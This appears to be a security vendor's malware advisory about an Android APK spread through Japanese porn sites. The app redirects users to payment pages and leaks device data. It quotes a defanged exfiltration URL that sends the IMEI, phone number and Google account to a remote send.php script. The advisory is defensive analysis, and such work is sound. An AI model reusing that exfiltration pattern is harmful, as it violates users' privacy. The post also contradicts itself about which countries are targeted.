Officially, this was the first case of being found. INCA Internet Security Response Center's Emergency Response Team has detected malicious file aiming at Japanese users, so we want to share about that.
This malicious application has same symptom as found before in Korea.
Though, it doesn't have malicious purpose, just collecting information without user's decision can be harmful someday.
2. Spreading path and symptoms of infection
In case of this malicious APK file, there hasn't been reported specific damage case on Korea; however, it is just spreading on Japanese porn sites and it is added as a pattern of our Anti-Virus.
Spreading files through
Direct URL link on certain porn site
Disguised as an essential file on distributor's web site
Clicking URL on that site can download APK file.
User can download on Japanese porn site.
This malicious application requires some permissions as following.
After installation, following run icon will be created. But it doesn't have its name.
Symptoms of infection
After the installation, executing malicious application will redirect user's page to payment.
Following is the sequence of malicious behaviors.
It accesses porn site with that address and it registers receiver with following code.
We can check the receiver registering procedure. At this time, receiver checks certain service and if a certain service is performing, it tries to leak to external site.
Following capture is a procedure of dynamic debugging. Disclosure of information is forward "- hxxp://(~).com/send.php?a_id=[IMEI]&telno=[telephone number]&m_addr=[Google Email account]&usr_id=[NULL]"
3. How to prevent
In case of this malicious application, it aimed at Russia and China, however; it is spreading all over the world in these days. To use smartphone safely from security threats of these malicious applications, we recommend following tips "Smartphone security management tips" for general users.
INCA Internet (Security Response Center / Emergency Response Team) provides diagnosis/treatment function with “nProtect Mobile for Android” for mobile such as malicious file stated above and runs responding system against various security threats.